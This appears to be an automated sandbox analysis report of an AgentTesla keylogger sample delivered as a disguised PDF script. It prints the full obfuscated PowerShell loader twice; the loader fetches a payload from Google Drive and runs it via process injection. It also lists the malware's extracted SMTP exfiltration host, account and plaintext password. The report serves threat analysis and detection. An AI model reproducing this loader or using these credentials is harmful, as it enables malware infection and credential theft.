agenttesla | 2709e4f356357ea81f0d62620cb8b291dcf2323036fde3d086688f9a4ed047f8

General

Target

20240403_SUA-000279-23.pdf.vbs
Size

39KB
MD5

9332a3e3c00a2be6ee157055b9abc8f5
SHA1

d495c9ed2015c481626609fcb53349ccb7734301
SHA256

27621d4524d2feed05a6b2e9e7a46874328060c0c1a39506ddfb08f94c7ea2d3
SHA512

921f161cd6cab441ae3e4cd92be05b3dc42845f5181e1d697d011a224cf9c6b7ae2c75f150f04fb9120a1a108b9898fefffdc132f6f4ddbfc641fa9bf81055b8
SSDEEP

768:u0zgBwjWAZGc8NnKwiQlPQcUyO0ljLecJhd:AYqNnKwNocUyO0/

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.electricistas-24hs.com.ar
Port:
587
Username:
[email protected]
Password:
Martin*olmos2017
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
5	drive.google.com
9	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	api.ipify.org
14	api.ipify.org
15	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
240	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2720	powershell.exe
240	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2720 set thread context of 240	2720	powershell.exe	34

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1632	powershell.exe
2720	powershell.exe
2720	powershell.exe
240	wab.exe
240	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2720	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	240	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1728 wrote to memory of 1632	1728	WScript.exe	28
PID 1728 wrote to memory of 1632	1728	WScript.exe	28
PID 1728 wrote to memory of 1632	1728	WScript.exe	28
PID 1632 wrote to memory of 2600	1632	powershell.exe	30
PID 1632 wrote to memory of 2600	1632	powershell.exe	30
PID 1632 wrote to memory of 2600	1632	powershell.exe	30
PID 1632 wrote to memory of 2720	1632	powershell.exe	32
PID 1632 wrote to memory of 2720	1632	powershell.exe	32
PID 1632 wrote to memory of 2720	1632	powershell.exe	32
PID 1632 wrote to memory of 2720	1632	powershell.exe	32
PID 2720 wrote to memory of 2440	2720	powershell.exe	33
PID 2720 wrote to memory of 2440	2720	powershell.exe	33
PID 2720 wrote to memory of 2440	2720	powershell.exe	33
PID 2720 wrote to memory of 2440	2720	powershell.exe	33
PID 2720 wrote to memory of 240	2720	powershell.exe	34
PID 2720 wrote to memory of 240	2720	powershell.exe	34
PID 2720 wrote to memory of 240	2720	powershell.exe	34
PID 2720 wrote to memory of 240	2720	powershell.exe	34
PID 2720 wrote to memory of 240	2720	powershell.exe	34
PID 2720 wrote to memory of 240	2720	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20240403_SUA-000279-23.pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Paramountly Approberingerne elevskolernes differentialkvotient apoplektikere Thorvaldsen Chally #>;$Consortable=(cmd /c set /A 115^^0);Function Stevensons ([String]$planlggelsen){$Lgdet=[char][int]$Consortable+'ubstring';$lightsmen=8;$Osmar=Programudvikling($planlggelsen);For($Corkwoods=7; $Corkwoods -lt $Osmar; $Corkwoods+=$lightsmen){$Terribilita=$planlggelsen.$Lgdet.Invoke($Corkwoods, 1);$correspondingly=$correspondingly+$Terribilita;}$correspondingly;}function Tankpasserens ($Overfrslen){& ($Privateje) ($Overfrslen);}function Programudvikling ([String]$Counterwave){$Mineralizing=$Counterwave.Length-1;$Mineralizing;}$Samletankens=Stevensons ' MovereTFuldbyrrOmkostnademonstnKomintesSjls ilfT ngesteujvntunr Reo ierFlutieriArterionFagbevggmandlig ';$Akkomoderende=Stevensons 'ghanesehMennesktSomewhet,ekstbepRecrosssOutbou : Ror ma/Governa/Re frdidSuperderCondol,iSideta vDeu esfeKarlfol.AlarmisgTonatiooJerrymao I tarsg Uh,ldelHkkelbee rbesk.Indkaldc B,drago gamli,mSolopg /DivergeuGenetikcAarstal?TabulateBaadplaxBruskedpFeroheroSmell urDentinet autohe=U edifydEyefulmoBrairdew Frigidn Finansl MerskuoBrdde.gaSkolehjd,ildnis&SigismuiForvrvldBaadtyp=Velsest1Ageable7LaundroC Far.edBGehenna-Desillu6 StetistUdtalerhAnsvarl-Fredain- N sotrtBebyrdet Mo,rke3HovedreEAlthionlNotan,udLredrenM CelebrQ Whackyiunmu.teLCarceris Rhamnaz.nsalubPPseudotFDetona.Wgar.enip.lanontG Dile teHudfletYForlggebRangletQKnsce lHenlis,ek Plante ';$Privateje=Stevensons 'ApiaceaienviouseRealtidx H,ndba ';$Bruget=Stevensons 'For udn$hortatogFilagrelKurslisomisenrobSureresaUnderh.lAfvikli:geranioRIot.zataHektogrdForcerabH ghboyr Amill,kiotizednAl ergiiUdfaldsnAcetophgBattemeeresp tenDyknder T nghre=Mer eri VentrosSCarminatHandelsaOve,vaerOutlivit.vistlr-galvaniB BrontoiPetrosatbekommesAfvrg mTToma,pur Paganea V.deren FollicsEphemerfBiopyrieTrivielr U.ders T.treri-She pmiS .loretoPat.nteuFoxingbrM.turercUnpalleeEohipp S,filit$svalestANikko,ekMewledbk piledeoHydrogemPampl.no,icromad.ksperteReafforr Nj,gtieRestaurnSulphurd.aktosee Paskon Klvedes-Insti uDSyltnineBatterisIndem.itNoctuidiUnslaken Udskrea Sass.btJespersiDidiniuo FrittenUsoigne Overhri$CastoreKSacrumsyDictyo.sStteskitmetalhjsCont intHell,olrImm rtak Encephnbland.niSuppor,nEvanescgStampere ,ranslrGena,skn,vantoves,egerssReshe,r ';Tankpasserens (Stevensons 'Jumelle$Pe elsgg Debattl LykkeloLanchapbV.lutaeaFdrelanlOverens: PrickfKKroelley Efter,s.epinertBrdf.ugs PalebutWarbirdrForval kHolocepnBenzinmiTopbelanFireugeg .irgineNytteplrOmrringnUdkkedee ,artelsAortost=barm.ca$ SikkerePaketshnepactssvPrincip:PedestraSpunsjepChildlepWatchwodMarescea spr,ebtAnmeldea Linoxy ') ;Tankpasserens (Stevensons 'Ashati,ISkefuldmDiciertpKroman.oldsterarskueplatPro,and-Smgen,sMVsensf oEksponedKumenikuCuredemlStormaneG stroe Clag,edBMonophoi FodfsttCo.servs,malmedT EinarsrFol,ereaZequi bn AlewafsMetam,rfRamos.le StamborSmigsgr ') ;$Kyststrkningernes=$Kyststrkningernes+'\Revaccinationens.afb' ;Tankpasserens (Stevensons 'hyperpa$MagtendgForsidel Sujetto Phosphb TracesaMrkes.gl Papemb:ElkdomaSAkillesaSkinnecmS.rattelH.lidaee Quilter Plai emTheatreaPreflavnOt,rrheiReassoc=Bagfjer( Da vagTalbatroeDuctilis Interct,okalom- UrvrkaP,roevetairritabtPe tisehBi.olou P askva$ FiduseKPeach.eyUxori,us Lagenlt UnicapsSal ssytHyaliterFremsttkLed agenRheinlniFondsv nUtilisagTriangleAarsagsrPdia rin,ishrage .ormnisS,nneps)Hostage ') ;while (-not $Samlermani) {Tankpasserens (Stevensons ' LeacheItheobrof Upjetu Testify(Boligha$ Mistf,RZurtjleaMisvkstdPlad.hubS,aapenrkalium.kComplimn AppendiKriminanTonguefgLagun,neFredninnSofacyk.ElvirasJAsafetioMa ulerbAnabelmSSkudtestImpugniaL,rstamt NittereLoghead Elabor,-Spderine,ozzetiqOphvels Micromo$b.skereSeksperia C.lubamQuitrenl ReinveeScleredtskiferta Fodp.nnBrio.hek.verganeKrys.alnSegmentsTran mi)Hu,drum Loobyi,{ frersoS ForskntKrft peaSkelletrGrah,mit Indole- AkkillSTrakkaslScyll oe LreproeKhmersmpRiobard Dukater1mul ist}ompha.ieSejernelStedbessDioxi.ee Prvepe{KrypterSEspart tJunkernaVrdikuprUnseductNonev,s-revolutS Ls.edrl,ongerseSt,rhedeGadehjrpUnlabor Udelade1 Sta.dp; Meta lTSpiri.haCorecipn scler,kCeonocypDeactivaNaboretsReadm.tsKomple,eFlirtisr Co,ntee.tultifnUnperpesMisinfo Overchu$Bolet iBHo,etowr .poleruomrystegJouis neWeakentt Kornel}Sweepag ');Tankpasserens (Stevensons 'Clitoro$BesjledgCaptanclWeddingoLecithibthorsteaCephalilFeazing: RontgeSGallo,yaUdfrittmer.oglalS mipopeLeu emirForetagmSkaanetaDepositnOpdyrkniVac.ola=Alkylfi(PrecoolTF ankose GenindsTrskoentDd stra-M.rokkaPAbov praFlbet.ntFgte.unh Fasti, Ref,eks$ FanjetKPaalideymoni,ors Hirun tTiltusksGrusnintTulreder Markrkk Udmrken Zobel,i nsuggenVandstvg GennemeplamagerBrevsamnTeindnieun ubtrsSaturni)Overhan ') ;}Tankpasserens (Stevensons ' depett$JokeprogHydrogrlRe,resho Va.dypbEngle,aaSammenflPredism:Shiats O Inspirp Bio enlOverbidaRe.astenRespektd,agtimeePdagogitafpling Naestve= Compea LucarneGStngelkeHadro.ntFor.gsa- Ter osCTheocraoBugbearnfjel.ettblndingeuntappinUnfo.matLev eds S,iple$ jernetKSkat evyBaseh.asSh,msgatTraditisReseq,etmanglerr SpirockDelprobn,arehusiOverdranEksklusgOga,lalepredesirStandarnBoledese ConfessRevolte ');Tankpasserens (Stevensons '.ensdyr$ ffedtegS,jdelelFrakrsloPapillobFotosa.aFormatolAl,erln:Pe.itriOElboicupFissionr gallinr ToppunsBagskrmsVaadesttUnv.lveiCardinaf H lpeft OlethreSkipp.erPrech l Nocias.=Litaiba ygning[Dispon,SBulldozyHngslersHe,rtletProlon.eCitr,nsmLundres..uttsgaCSatsarboFoedevanReetablv.addelme Gennemr PhotoktI,dchec] Maaned: ufor n:NogentiFBarmiesrSnuppeno Hedtanm ScatosBbidentiaSauroctstarife eVindkra6Nrligge4CalcipeS skri.etmaskinor Apoembi AlvorlnForstvsg agsger(Ansttel$afflatuOGenyantpReedm.nl .okereaReincapn CovetedHarvnineafs,itntAnarki,)Skjo te ');Tankpasserens (Stevensons 'Tuftska$Suspe sgSum,hpjl AnthrooUngoverbRemagnea.ilstopl Carton:ArcedavMforstrkeArsmetiiSerescan tudevoe Afs,rirEbullietSkilre. Knoerpo= Omsorg Miterw[U.opfreSS.ndikaydiskotesUneschetAnglopheskaglesmPred.fe.KlaustrTNoviciaeWrithedx ernbantLexicol.rigleniETailyopnsemis,vcHalverso Jayc edSpurri idiaspornDi.ponegUnlabia]Gr.ttle:Bdeudma:BethornAMarginaSCurrishC H,delsICacophoISulfazi.OverbebGIndefrye SkabsdtSpellboSDemurrat Airwa r Vederhi SkalpenCytochegBaskerv(Microhi$Adf dsfOPr,distp,erveburTragtharBlo,sdrsAmphictsKultu,stProfessiTritopifAmtsbortQuindeceUnviol.rKaut on)Wooe po ');Tankpasserens (Stevensons 'Initial$ MidtergAkustiklMellemlo RegeribSalateraDemiv,llMotoriz:,emiterBDep oreaStonisha,orelledMtaalelsPaprikamFjeldrraSkaar gnHinduerdKimberlsPred sis armarktVidundeoMilitrtl Snork 1prealli4Yrkern,2 Respek= ituati$NinoxmaMSymphyseHringeriExc ucinHakkebfeMdendesrCloacast Harp,o.BogmarksTmrerbluVicomt,b skraassPj skfutShefftarPampangi AkustinIndbildg Ce bal(Redning3Nettok 0Asteroi0praxis.1Dekstri6 Catsti2 Unuanc,Taurino3angrebs2,ercept1Ti illa5Skattei1Barra r)Total.p ');Tankpasserens $Baadsmandsstol142;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    3⤵
    PID:2600
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Paramountly Approberingerne elevskolernes differentialkvotient apoplektikere Thorvaldsen Chally #>;$Consortable=(cmd /c set /A 115^^0);Function Stevensons ([String]$planlggelsen){$Lgdet=[char][int]$Consortable+'ubstring';$lightsmen=8;$Osmar=Programudvikling($planlggelsen);For($Corkwoods=7; $Corkwoods -lt $Osmar; $Corkwoods+=$lightsmen){$Terribilita=$planlggelsen.$Lgdet.Invoke($Corkwoods, 1);$correspondingly=$correspondingly+$Terribilita;}$correspondingly;}function Tankpasserens ($Overfrslen){& ($Privateje) ($Overfrslen);}function Programudvikling ([String]$Counterwave){$Mineralizing=$Counterwave.Length-1;$Mineralizing;}$Samletankens=Stevensons ' MovereTFuldbyrrOmkostnademonstnKomintesSjls ilfT ngesteujvntunr Reo ierFlutieriArterionFagbevggmandlig ';$Akkomoderende=Stevensons 'ghanesehMennesktSomewhet,ekstbepRecrosssOutbou : Ror ma/Governa/Re frdidSuperderCondol,iSideta vDeu esfeKarlfol.AlarmisgTonatiooJerrymao I tarsg Uh,ldelHkkelbee rbesk.Indkaldc B,drago gamli,mSolopg /DivergeuGenetikcAarstal?TabulateBaadplaxBruskedpFeroheroSmell urDentinet autohe=U edifydEyefulmoBrairdew Frigidn Finansl MerskuoBrdde.gaSkolehjd,ildnis&SigismuiForvrvldBaadtyp=Velsest1Ageable7LaundroC Far.edBGehenna-Desillu6 StetistUdtalerhAnsvarl-Fredain- N sotrtBebyrdet Mo,rke3HovedreEAlthionlNotan,udLredrenM CelebrQ Whackyiunmu.teLCarceris Rhamnaz.nsalubPPseudotFDetona.Wgar.enip.lanontG Dile teHudfletYForlggebRangletQKnsce lHenlis,ek Plante ';$Privateje=Stevensons 'ApiaceaienviouseRealtidx H,ndba ';$Bruget=Stevensons 'For udn$hortatogFilagrelKurslisomisenrobSureresaUnderh.lAfvikli:geranioRIot.zataHektogrdForcerabH ghboyr Amill,kiotizednAl ergiiUdfaldsnAcetophgBattemeeresp tenDyknder T nghre=Mer eri VentrosSCarminatHandelsaOve,vaerOutlivit.vistlr-galvaniB BrontoiPetrosatbekommesAfvrg mTToma,pur Paganea V.deren FollicsEphemerfBiopyrieTrivielr U.ders T.treri-She pmiS .loretoPat.nteuFoxingbrM.turercUnpalleeEohipp S,filit$svalestANikko,ekMewledbk piledeoHydrogemPampl.no,icromad.ksperteReafforr Nj,gtieRestaurnSulphurd.aktosee Paskon Klvedes-Insti uDSyltnineBatterisIndem.itNoctuidiUnslaken Udskrea Sass.btJespersiDidiniuo FrittenUsoigne Overhri$CastoreKSacrumsyDictyo.sStteskitmetalhjsCont intHell,olrImm rtak Encephnbland.niSuppor,nEvanescgStampere ,ranslrGena,skn,vantoves,egerssReshe,r ';Tankpasserens (Stevensons 'Jumelle$Pe elsgg Debattl LykkeloLanchapbV.lutaeaFdrelanlOverens: PrickfKKroelley Efter,s.epinertBrdf.ugs PalebutWarbirdrForval kHolocepnBenzinmiTopbelanFireugeg .irgineNytteplrOmrringnUdkkedee ,artelsAortost=barm.ca$ SikkerePaketshnepactssvPrincip:PedestraSpunsjepChildlepWatchwodMarescea spr,ebtAnmeldea Linoxy ') ;Tankpasserens (Stevensons 'Ashati,ISkefuldmDiciertpKroman.oldsterarskueplatPro,and-Smgen,sMVsensf oEksponedKumenikuCuredemlStormaneG stroe Clag,edBMonophoi FodfsttCo.servs,malmedT EinarsrFol,ereaZequi bn AlewafsMetam,rfRamos.le StamborSmigsgr ') ;$Kyststrkningernes=$Kyststrkningernes+'\Revaccinationens.afb' ;Tankpasserens (Stevensons 'hyperpa$MagtendgForsidel Sujetto Phosphb TracesaMrkes.gl Papemb:ElkdomaSAkillesaSkinnecmS.rattelH.lidaee Quilter Plai emTheatreaPreflavnOt,rrheiReassoc=Bagfjer( Da vagTalbatroeDuctilis Interct,okalom- UrvrkaP,roevetairritabtPe tisehBi.olou P askva$ FiduseKPeach.eyUxori,us Lagenlt UnicapsSal ssytHyaliterFremsttkLed agenRheinlniFondsv nUtilisagTriangleAarsagsrPdia rin,ishrage .ormnisS,nneps)Hostage ') ;while (-not $Samlermani) {Tankpasserens (Stevensons ' LeacheItheobrof Upjetu Testify(Boligha$ Mistf,RZurtjleaMisvkstdPlad.hubS,aapenrkalium.kComplimn AppendiKriminanTonguefgLagun,neFredninnSofacyk.ElvirasJAsafetioMa ulerbAnabelmSSkudtestImpugniaL,rstamt NittereLoghead Elabor,-Spderine,ozzetiqOphvels Micromo$b.skereSeksperia C.lubamQuitrenl ReinveeScleredtskiferta Fodp.nnBrio.hek.verganeKrys.alnSegmentsTran mi)Hu,drum Loobyi,{ frersoS ForskntKrft peaSkelletrGrah,mit Indole- AkkillSTrakkaslScyll oe LreproeKhmersmpRiobard Dukater1mul ist}ompha.ieSejernelStedbessDioxi.ee Prvepe{KrypterSEspart tJunkernaVrdikuprUnseductNonev,s-revolutS Ls.edrl,ongerseSt,rhedeGadehjrpUnlabor Udelade1 Sta.dp; Meta lTSpiri.haCorecipn scler,kCeonocypDeactivaNaboretsReadm.tsKomple,eFlirtisr Co,ntee.tultifnUnperpesMisinfo Overchu$Bolet iBHo,etowr .poleruomrystegJouis neWeakentt Kornel}Sweepag ');Tankpasserens (Stevensons 'Clitoro$BesjledgCaptanclWeddingoLecithibthorsteaCephalilFeazing: RontgeSGallo,yaUdfrittmer.oglalS mipopeLeu emirForetagmSkaanetaDepositnOpdyrkniVac.ola=Alkylfi(PrecoolTF ankose GenindsTrskoentDd stra-M.rokkaPAbov praFlbet.ntFgte.unh Fasti, Ref,eks$ FanjetKPaalideymoni,ors Hirun tTiltusksGrusnintTulreder Markrkk Udmrken Zobel,i nsuggenVandstvg GennemeplamagerBrevsamnTeindnieun ubtrsSaturni)Overhan ') ;}Tankpasserens (Stevensons ' depett$JokeprogHydrogrlRe,resho Va.dypbEngle,aaSammenflPredism:Shiats O Inspirp Bio enlOverbidaRe.astenRespektd,agtimeePdagogitafpling Naestve= Compea LucarneGStngelkeHadro.ntFor.gsa- Ter osCTheocraoBugbearnfjel.ettblndingeuntappinUnfo.matLev eds S,iple$ jernetKSkat evyBaseh.asSh,msgatTraditisReseq,etmanglerr SpirockDelprobn,arehusiOverdranEksklusgOga,lalepredesirStandarnBoledese ConfessRevolte ');Tankpasserens (Stevensons '.ensdyr$ ffedtegS,jdelelFrakrsloPapillobFotosa.aFormatolAl,erln:Pe.itriOElboicupFissionr gallinr ToppunsBagskrmsVaadesttUnv.lveiCardinaf H lpeft OlethreSkipp.erPrech l Nocias.=Litaiba ygning[Dispon,SBulldozyHngslersHe,rtletProlon.eCitr,nsmLundres..uttsgaCSatsarboFoedevanReetablv.addelme Gennemr PhotoktI,dchec] Maaned: ufor n:NogentiFBarmiesrSnuppeno Hedtanm ScatosBbidentiaSauroctstarife eVindkra6Nrligge4CalcipeS skri.etmaskinor Apoembi AlvorlnForstvsg agsger(Ansttel$afflatuOGenyantpReedm.nl .okereaReincapn CovetedHarvnineafs,itntAnarki,)Skjo te ');Tankpasserens (Stevensons 'Tuftska$Suspe sgSum,hpjl AnthrooUngoverbRemagnea.ilstopl Carton:ArcedavMforstrkeArsmetiiSerescan tudevoe Afs,rirEbullietSkilre. Knoerpo= Omsorg Miterw[U.opfreSS.ndikaydiskotesUneschetAnglopheskaglesmPred.fe.KlaustrTNoviciaeWrithedx ernbantLexicol.rigleniETailyopnsemis,vcHalverso Jayc edSpurri idiaspornDi.ponegUnlabia]Gr.ttle:Bdeudma:BethornAMarginaSCurrishC H,delsICacophoISulfazi.OverbebGIndefrye SkabsdtSpellboSDemurrat Airwa r Vederhi SkalpenCytochegBaskerv(Microhi$Adf dsfOPr,distp,erveburTragtharBlo,sdrsAmphictsKultu,stProfessiTritopifAmtsbortQuindeceUnviol.rKaut on)Wooe po ');Tankpasserens (Stevensons 'Initial$ MidtergAkustiklMellemlo RegeribSalateraDemiv,llMotoriz:,emiterBDep oreaStonisha,orelledMtaalelsPaprikamFjeldrraSkaar gnHinduerdKimberlsPred sis armarktVidundeoMilitrtl Snork 1prealli4Yrkern,2 Respek= ituati$NinoxmaMSymphyseHringeriExc ucinHakkebfeMdendesrCloacast Harp,o.BogmarksTmrerbluVicomt,b skraassPj skfutShefftarPampangi AkustinIndbildg Ce bal(Redning3Nettok 0Asteroi0praxis.1Dekstri6 Catsti2 Unuanc,Taurino3angrebs2,ercept1Ti illa5Skattei1Barra r)Total.p ');Tankpasserens $Baadsmandsstol142;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      4⤵
      PID:2440
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
67c64383e0659a53401b8613ca955182

SHA1
9814e00ad50a9b192ec7656347cf5f92a83b70cd

SHA256
27dd1f2b652cc45f4d25998c1fd9233cd75129be6d1a1ec5538bd75670d60210

SHA512
d1c2495d884b2a0a03fc1cc66ebc2290a64a8bd27d7c79d00eef2653cbfab697da7ea613323fc6ad3a94b7cf4f9ad84792221c7b0c2a292a63a13b0326a1bbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab80A5.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JEGNJHNU5VG5AU9Q9ICR.temp

Filesize
7KB

MD5
1888b441ad87c350d8966e202dc4d97b

SHA1
c499c41cd5a4c441805d85a9f2a5de3b484a0280

SHA256
0ccc74a8fdb7333d5f66ba429d43a920ec8c4ee693d68feb9e3e547d93407512

SHA512
e3280cfb7ea154c5ec2fd8f280e5477fd18e79f3a6f398624611b4826aa8727ecad32cdae5bb75438543b6bf895a2fb7d48bca903e0bc56407722f4e2b31136b

Download Submit
memory/240-47-0x0000000000E90000-0x0000000001EF2000-memory.dmp

Filesize
16.4MB

Download
memory/240-49-0x0000000000E90000-0x0000000000ED2000-memory.dmp

Filesize
264KB

Download
memory/1632-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/1632-10-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-11-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-4-0x000007FEF5E3E000-0x000007FEF5E3F000-memory.dmp

Filesize
4KB

Download
memory/1632-24-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-25-0x000007FEF5E3E000-0x000007FEF5E3F000-memory.dmp

Filesize
4KB

Download
memory/1632-7-0x0000000002B20000-0x0000000002B42000-memory.dmp

Filesize
136KB

Download
memory/1632-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/1632-9-0x0000000002A20000-0x0000000002A32000-memory.dmp

Filesize
72KB

Download
memory/1632-48-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-8-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/2720-23-0x00000000068C0000-0x0000000008E23000-memory.dmp

Filesize
37.4MB

Download

Analysis

Sharing